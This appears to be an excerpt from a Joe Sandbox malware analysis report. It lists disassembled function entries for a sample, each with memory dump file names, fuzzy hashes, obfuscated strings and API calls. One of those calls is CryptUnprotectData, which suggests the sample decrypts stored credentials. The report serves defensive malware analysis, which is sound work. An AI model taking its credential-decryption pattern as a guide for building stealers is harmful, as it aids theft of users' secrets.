                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 5b927367cb47519fbfb654d1bcad52a16d6594a7137cdccdf39ac2248a2093b6
                                    • Instruction ID: 7a7f4660ef283be8047f1c7b87488b4ae6346e1f1c442c20ad3ac3bd8ba6df5c
                                    • Opcode Fuzzy Hash: 5b927367cb47519fbfb654d1bcad52a16d6594a7137cdccdf39ac2248a2093b6
                                    • Instruction Fuzzy Hash: 7411A1B190A318EBEB209B55DD49FA9B778FB44711F1003E5F61AA32D0DB745E409F50
                                    Function 010D66C9 Relevance: 5.7, Strings: 4, Instructions: 653COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7L^O$T;8$to=$JU.
                                    • API String ID: 0-3591199257
                                    • Opcode ID: 9808a581958dbafa64386bac1e6c766fe9c543167bd7f38f1400c13b86bfede2
                                    • Instruction ID: 1a601e52411f8448d3afbf90e6fe8270c043130b561e814cac8ddbae9366ecbe
                                    • Opcode Fuzzy Hash: 9808a581958dbafa64386bac1e6c766fe9c543167bd7f38f1400c13b86bfede2
                                    • Instruction Fuzzy Hash: 4B12F5F390C210AFE7046E2DEC8566ABBE5EF94320F1A4A3DEAC4C7744E63558058797
                                    Function 010D3F90 Relevance: 5.3, Strings: 3, Instructions: 1595COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?>]$GaoE$Y\=
                                    • API String ID: 0-3927692836
                                    • Opcode ID: 6fb4ec97bee8dc214068cfd7ddc2d5908dcd1e8091028d487858f63ccd49ba56
                                    • Instruction ID: efa54a06c02d2ead96279d11cc734d7c6a6609eb4b7d32dd773fb49511b32461
                                    • Opcode Fuzzy Hash: 6fb4ec97bee8dc214068cfd7ddc2d5908dcd1e8091028d487858f63ccd49ba56
                                    • Instruction Fuzzy Hash: 9AB208F3A0C210AFE3046E2DEC8567ABBE9EF94720F16493DEAC4C3744E63558058697
                                    Function 010DC997 Relevance: 5.2, Strings: 3, Instructions: 1433COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: a^aa$G~q$/h
                                    • API String ID: 0-28058989
                                    • Opcode ID: 5f118ac7241cfa3cf64bc4f80874fbb0d522f08b0484dc9077ef6f22d58a2976
                                    • Instruction ID: c01e04a651f7d8b3c25b11e300052487d50b3fc4bddfa0d5b30a946a6879c626
                                    • Opcode Fuzzy Hash: 5f118ac7241cfa3cf64bc4f80874fbb0d522f08b0484dc9077ef6f22d58a2976
                                    • Instruction Fuzzy Hash: 11A2D4F3A0C2009FE704AE29EC8567AFBE5EF94720F16893DE6C587344EA3558058797
                                    Function 010E002E Relevance: 5.1, Strings: 3, Instructions: 1378COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: u\$HroJ$Kw
                                    • API String ID: 0-2923540231
                                    • Opcode ID: 6d7277bae33ba28a51242f5d9ba53783d288243cac2aea8d6c790ddacc8f0c6a
                                    • Instruction ID: 5050ab236a371d76d634d0b04c52a1e522b2687842ac85eb65611a122d737b57
                                    • Opcode Fuzzy Hash: 6d7277bae33ba28a51242f5d9ba53783d288243cac2aea8d6c790ddacc8f0c6a
                                    • Instruction Fuzzy Hash: AE92F5F3A08204AFE704AE2DDC8567ABBE5EF94720F16893DEAC4C7344E63558418797
                                    Function 00C93970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(00C9E120,00000000,00000001,00C9E110,00000000), ref: 00C939A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C93A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: ee7841ed2226257b0f6bf31bda5905b1ff35e5a2c083fe93bd92c3891d29a8dc
                                    • Instruction ID: 1a4d71798cef2687512d1412a880bb8ee76055f89034678402a69aed26f61b80
                                    • Opcode Fuzzy Hash: ee7841ed2226257b0f6bf31bda5905b1ff35e5a2c083fe93bd92c3891d29a8dc
                                    • Instruction Fuzzy Hash: 3E41E870A40A289FDB24DB58CC99F9BB7B5BB48702F4041D8E618E72E0D7B16E85CF50
                                    Function 00C8A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C8A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C8A2F3
                                    • LocalFree.KERNEL32(?), ref: 00C8A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: fc919d0ed911ac3edea2a8b8e11b7c7d86166984c046e6b11f8aae4b82ef877b
                                    • Instruction ID: 2b3092e9ac3272bac587a8086c65ae64781ac68e00bbc58f4e01bd6c8a7bf189
                                    • Opcode Fuzzy Hash: fc919d0ed911ac3edea2a8b8e11b7c7d86166984c046e6b11f8aae4b82ef877b
                                    • Instruction Fuzzy Hash: 8F11D3B8A00209EFDB04DFA4D884AAEB7B5FB89305F104559E915A7350D770AA50CB61
                                    Function 010D74CA Relevance: 4.1, Strings: 2, Instructions: 1645COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &ra_$Ze'f
                                    • API String ID: 0-2306317784
                                    • Opcode ID: 2607e61c034cfa94173ea2481d9aaf1553f4af4ba4d98a9fea3eb64867ef748a
                                    • Instruction ID: e5e92c41a632f49cf6d0b5261b87c9f8eac7e9fc5338439f890af452d94aef96
                                    • Opcode Fuzzy Hash: 2607e61c034cfa94173ea2481d9aaf1553f4af4ba4d98a9fea3eb64867ef748a
                                    • Instruction Fuzzy Hash: 6DB259F3A0C2049FE3046E2DEC45A7ABBE9EF94720F16463DEAC4C7744EA3558058796
                                    Function 010EB839 Relevance: 4.1, Strings: 2, Instructions: 1615COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %r>y$Rk~
                                    • API String ID: 0-3305111540
                                    • Opcode ID: 0f1c3f5cab0e2af0c278669fb0012b6ad09e412eb566199b04a7d4e4fc7b5451
                                    • Instruction ID: 55613e1e5adb1b75cf8021763981e7f0588bc6ba925a6e3b51fed4d5d457f30a
                                    • Opcode Fuzzy Hash: 0f1c3f5cab0e2af0c278669fb0012b6ad09e412eb566199b04a7d4e4fc7b5451
                                    • Instruction Fuzzy Hash: 14B2E6F360C2049FE304AE29EC8567AFBE5EBD4720F1A893DEAC4C7744E63558058796
                                    Function 010DE230 Relevance: 4.1, Strings: 2, Instructions: 1613COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *P[$L}e~
                                    • API String ID: 0-1081260897
                                    • Opcode ID: 4e12368b1a90699a9d06a5e45e7086589f008cbaeaa1b4c60d84654c549eafa1
                                    • Instruction ID: 2970e5e7bc6ecb9ab2ab2a3fcec99149c4f19faaf092733282efa3830101c286
                                    • Opcode Fuzzy Hash: 4e12368b1a90699a9d06a5e45e7086589f008cbaeaa1b4c60d84654c549eafa1
                                    • Instruction Fuzzy Hash: 76B229F3A0C2049FE304AE2DEC8567BBBE5EF94720F1A893DE6C583744E93558058693
                                    Function 010E82D0 Relevance: 4.1, Strings: 2, Instructions: 1604COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 1IOo$5Nu
                                    • API String ID: 0-628492930
                                    • Opcode ID: f1039e87fa3ad202ed8bde91a3d595f5d5fb3be33f2b1763d80931774f3de476
                                    • Instruction ID: fa85172b3149b55bfefc5a0ae3e4e7709ed5a73f6f0c9047550df8e1ec3bab4a
                                    • Opcode Fuzzy Hash: f1039e87fa3ad202ed8bde91a3d595f5d5fb3be33f2b1763d80931774f3de476
                                    • Instruction Fuzzy Hash: AAB217F3A0C2049FE7046E2DDC8566AFBE9EF94720F1A493DEAC4C7744EA3558048697
                                    Function 00CF4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
